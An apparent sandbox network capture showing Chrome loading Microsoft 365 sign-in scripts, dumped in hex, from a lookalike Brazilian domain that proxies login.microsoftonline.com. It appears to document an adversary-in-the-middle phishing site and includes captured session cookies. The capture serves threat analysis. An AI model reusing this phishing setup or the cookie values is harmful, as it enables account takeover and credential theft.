                                                        2025-03-17 16:42:49 UTC3231OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_yYLwtowrqBEhphSPA6BiJQ2.js HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:49 UTC139INHTTP/1.1 200 OK
                                                        Content-Length: 689017
                                                        Content-Type: application/x-javascript
                                                        Date: Mon, 17 Mar 2025 16:42:49 GMT
                                                        Connection: close
                                                        2025-03-17 16:42:49 UTC16245INData Raw: 0a 21 28 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 20 7b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 74 2c 20 69 2c 20 6f 20 3d 20 6e 5b 30 5d 2c 20 72 20 3d 20 6e 5b 31 5d 2c 20 73 20 3d 20 30 2c 20 63 20 3d 20 5b 5d 3b 20 73 20 3c 20 6f 2e 6c 65 6e 67 74 68 3b 20 73 2b 2b 29 0a 20 20 20 20 20 20 28 69 20 3d 20 6f 5b 73 5d 29 2c 0a 20 20 20 20 20 20 20 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 20 69 29 20 26 26 20 61 5b 69 5d 20 26 26 20 63 2e 70 75 73 68 28 61 5b 69 5d 5b 30 5d 29 2c 0a 20 20 20 20 20 20 20 20 28 61 5b 69 5d 20 3d 20 30 29 3b 0a 20 20 20 20 66 6f 72 20 28 74 20 69 6e 20 72 29 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f
                                                        Data Ascii: !(function (e) { function n(n) { for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++) (i = o[s]), Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]), (a[i] = 0); for (t in r) Object.proto
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 6f 63 6b 65 64 3a 20 31 30 30 2c 0a 20 20 20 20 20 20 20 20 54 69 6c 65 73 3a 20 31 30 32 2c 0a 20 20 20 20 20 20 20 20 52 65 6d 6f 74 65 43 6f 6e 6e 65 63 74 3a 20 31 30 33 2c 0a 20 20 20 20 20 20 20 20 46 65 64 43 6f 6e 66 6c 69 63 74 3a 20 31 30 35 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 3a 20 31 30 36 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 5f 50 68 6f 6e 65 53 69 67 6e 69 6e 3a 20 31 30 37 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 46 69 6e 69 73 68 3a 20 31 30 38 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 53 74 72 6f 6e 67 41 75 74 68 3a 20 31 30 39 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 48 49 50 5f 4c 6f 67 69 6e 3a 20 31 31
                                                        Data Ascii: ocked: 100, Tiles: 102, RemoteConnect: 103, FedConflict: 105, Win10Host_Login: 106, Win10Host_Login_PhoneSignin: 107, Win10Host_Finish: 108, Win10Host_StrongAuth: 109, Win10Host_HIP_Login: 11
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 20 28 50 52 4f 4f 46 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 54 79 70 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 41 6c 74 45 6d 61 69 6c 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 53 4d 53 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 20 20 44 65 76 69 63 65 49 64 3a 20 34 2c 0a 20 20 20 20 20 20 20 20 20 20 43 53 53 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 53 51 53 41 3a 20 36 2c 0a 20 20 20 20 20 20 20 20 20 20 43 65 72 74 69 66 69 63 61 74 65 3a 20 37 2c 0a 20 20 20 20 20 20 20 20 20 20 48 49 50 3a 20 38 2c 0a 20 20 20 20 20 20 20 20 20 20 42 69 72 74 68 64 61 79 3a 20 39 2c 0a 20 20 20 20 20 20 20 20 20 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 3a 20 31 30 2c 0a 20 20 20 20 20 20
                                                        Data Ascii: (PROOF = { Type: { Email: 1, AltEmail: 2, SMS: 3, DeviceId: 4, CSS: 5, SQSA: 6, Certificate: 7, HIP: 8, Birthday: 9, TOTPAuthenticator: 10,
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 6e 20 7c 7c 20 22 22 20 3d 3d 3d 20 6e 20 7c 7c 20 28 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 50 2e 70 61 72 73 65 28 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 71 75 65 72 79 20 3d 20 74 2e 71 75 65 72 79 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 73 2e 66 69 6e 64 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 2e 71 75 65 72 79 2c 20 65 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 20 3f 20 74 2e 71 75 65 72 79 5b 69 5d 20 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 46 72 6f 6d 43
                                                        Data Ascii: n || "" === n || (n = document.location.search); var t = P.parse(n); t.query = t.query || {}; var i = s.findOwnProperty(t.query, e, !0); return i ? t.query[i] : ""; }, appendOrReplaceFromC
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 5d 2f 67 2c 0a 20 20 20 20 20 20 20 20 20 20 67 61 70 2c 0a 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 6e 74 2c 0a 20 20 20 20 20 20 20 20 20 20 6d 65 74 61 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 62 22 3a 20 22 5c 5c 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 74 22 3a 20 22 5c 5c 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 6e 22 3a 20 22 5c 5c 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 66 22 3a 20 22 5c 5c 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 72 22 3a 20 22 5c 5c 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 22 27 3a 20 27 5c 5c 22 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 5c 22 3a 20 22 5c 5c 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: ]/g, gap, indent, meta = { "\b": "\\b", "\t": "\\t", "\n": "\\n", "\f": "\\f", "\r": "\\r", '"': '\\"', "\\": "\\\\", },
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 20 20 20 20 76 61 72 20 6d 20 3d 20 66 2e 61 64 64 28 64 2c 20 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 2e 74 61 72 67 65 74 55 72 6c 20 3d 20 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 61 2e 48 61 6e 64 6c 65 72 2e 63 61 6c 6c 28 6e 2c 20 70 29 2c 20 6e 2e 73 65 6e 64 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 20 20 28 6e 2e 42 65 61 63 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 2c 20 69 2c 20 61 2c 20 6f 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 76 28 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 70 2e 66 6f 72 45 61 63 68 28
                                                        Data Ascii: var m = f.add(d, c); p.targetUrl = m; } } a.Handler.call(n, p), n.sendRequest(); }), (n.Beacon = function (e, t, i, a, o) { var r = [], s = v(!0); p.forEach(
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 6e 20 3f 20 28 6c 20 3d 3d 3d 20 70 2e 46 54 45 72 72 6f 72 20 3f 20 68 28 65 2c 20 64 29 20 3a 20 76 28 65 2c 20 64 29 29 20 3a 20 62 28 65 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 67 20 3d 20 22 22 29 2c 20 28 6c 20 3d 20 70 2e 45 72 72 6f 72 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 54 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 6c 20 3d 20 70 2e 54 69 6d 65 6f 75 74 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 28 67 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20
                                                        Data Ascii: n ? (l === p.FTError ? h(e, d) : v(e, d)) : b(e); } function k() { (g = ""), (l = p.Error), (u = ""), (f = ""), v(d); } function T() { (l = p.Timeout), (u = ""), (f = ""), (g = ""), v(d);
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 3d 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 7b 20 63 72 65 64 54 79 70 65 3a 20 6d 2e 4f 6e 65 54 69 6d 65 43 6f 64 65 2c 20 70 72 6f 6f 66 3a 20 65 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 77 69 74 63 68 20 28 28 28 74 2e 70 72 6f 6f 66 2e 69 73 45 6e 63 72 79 70 74 65 64 20 3d 20 21 30 29 2c 20 65 2e 74 79 70 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 53 4d 53 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 56 6f 69 63 65 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 69 73 56 6f 69 63 65 4f 6e 6c 79 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: = n) { var t = { credType: m.OneTimeCode, proof: e }; switch (((t.proof.isEncrypted = !0), e.type)) { case PROOF.Type.SMS: case PROOF.Type.Voice: if (!e.isVoiceOnly) {
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 3d 20 70 2e 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 3f 22 20 2b 20 67 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 77 63 74 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4c 6f 67 69 6e 4f 70 74 69 6f 6e 73 25 33 44 33 25 32 36 22 20 2b 20 70 2e 65 78 74 72 61 63 74 28 22 77 63 74 78 22 2c 20 22 3f 22 20 2b 20 67 65 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 74 20 3d 20 74 2e 73 75 62 73 74 72 28 31 29 29 2c 20 28 65 20 3d 20 70 2e 61 70 70 65 6e 64 28 65 2c 20 74 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: = p.appendOrReplace( "?" + ge, "wctx", "LoginOptions%3D3%26" + p.extract("wctx", "?" + ge) ); (t = t.substr(1)), (e = p.append(e, t));
                                                        2025-03-17 16:42:49 UTC16384INData Raw: 20 20 28 65 2e 65 78 70 6f 72 74 73 20 3d 20 70 29 3b 0a 20 20 7d 2c 0a 20 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 76 61 72 20 69 20 3d 20 74 28 32 29 2c 0a 20 20 20 20 20 20 61 20 3d 20 74 28 31 29 2c 0a 20 20 20 20 20 20 6f 20 3d 20 74 28 34 29 2c 0a 20 20 20 20 20 20 72 20 3d 20 74 28 30 29 2c 0a 20 20 20 20 20 20 73 20 3d 20 77 69 6e 64 6f 77 2c 0a 20 20 20 20 20 20 63 20 3d 20 72 2e 44 69 61 6c 6f 67 49 64 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 6e 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 74 20 3d 20 65 2e 69 73 50 6c 61 74 66 6f 72 6d 41 75 74 68 65 6e 74 69 63 61 74 6f 72 41 76 61 69 6c 61 62 6c 65 3b 0a 20 20 20 20 20 20 28 6e 2e 6f 6e 52 65 67
                                                        Data Ascii: (e.exports = p); }, function (e, n, t) { var i = t(2), a = t(1), o = t(4), r = t(0), s = window, c = r.DialogId; function d(e) { var n = this, t = e.isPlatformAuthenticatorAvailable; (n.onReg


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.44977723.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:49 UTC3250OUTGET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_0lh3lajrog_lmhvtw2rbbq2.js HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:49 UTC1384INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:49 GMT
                                                        Content-Type: application/x-javascript
                                                        content-length: 58435
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Fri, 14 Feb 2025 21:37:53 GMT
                                                        ETag: 0x8DD4D3FD64FE632
                                                        x-ms-request-id: decec614-f01e-0050-3382-960106000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164249Z-r1769bfd58bwrn2jhC1YTOzykn0000000140000000008y6p
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:42:49 UTC10INData Raw: 1f 8b 08 00 00 00 00 00 00 03
                                                        Data Ascii:
                                                        2025-03-17 16:42:49 UTC16374INData Raw: dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c8 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd 5d 1f 59 59 59 59 99 59 99 59 7f 98 af fd 69 ec 05 fe 9e d8 7f 54 bf 0b c1 9e bf ff e8 cd f7 bc 1f fd 9f f7 43 11 af 43 bf 80 bf 4b e2 d3 2a 08 e3 e8 d5 47 37 2c 84 0d 7c d5 78 94 ef ea 8f 9f 1d 6f 56 f7 9d 45 e0 ce c4 ac fe 87 ca e7 57 b2 aa c0 aa 53 77 b1 d8 0b 55 0b 4e e8 24 bf 83 7d 78 e0 6a 8d 3f 94 93 0f 9f b1 1b af f1 a8 1b 0a 4a cb 86 70 82 d2 b4 e1 c1 bf ab 46 b1 e8 04 7b e5 fd cf 7b 3f 26 c3 70 02 c7 03 e0 f7 aa fb 04 a5 df f0 f6 2a d0 3e fc 39 dc 77 62 f8 73 b4 ef b8 8d b8 34 8a 43 cf bf 89
                                                        Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo]YYYYYYiTCCK*G7,|xoVEWSwUN$}xj?JpF{{?&p*>9wbs4C
                                                        2025-03-17 16:42:49 UTC170INData Raw: 4c 01 27 9d 8f 74 50 0e f3 4f bf 26 8a 77 72 ac af a2 09 64 7b 93 c0 bf 08 5c 0c be 02 11 37 af b0 52 b0 ec c2 68 95 23 11 11 b8 99 1f 3f a1 13 cc 3b c8 d2 05 e8 41 e2 e0 59 75 b5 7a 41 39 f5 30 8c 7c 67 ef 29 a8 ad b0 5d 6c 00 b3 02 a8 38 ac f7 c0 59 45 a6 fe 0d f7 de 8d c8 9b 4d 9b 02 2a 07 a8 0a 6c a9 69 c1 9e 04 4e 1f ec ec d2 aa c8 b3 29 8d 01 58 b7 b2 03 5c 63 b8 c9 38 0f ca d5 9d e3 34 2a a6 3a ad 3e a7 d3 77 97 a3 2e 57 aa 7e fe fc f3 be c3 f9 57 4b 93 49 e3 0f e5 57 ff 0f 8a 6e 75 96 43 e4 00 00
                                                        Data Ascii: L'tPO&wrd{\7Rh#?;AYuzA90|g)]l8YEM*liN)X\c84*:>w.W~WKIWnuC


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.44978123.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:50 UTC3213OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
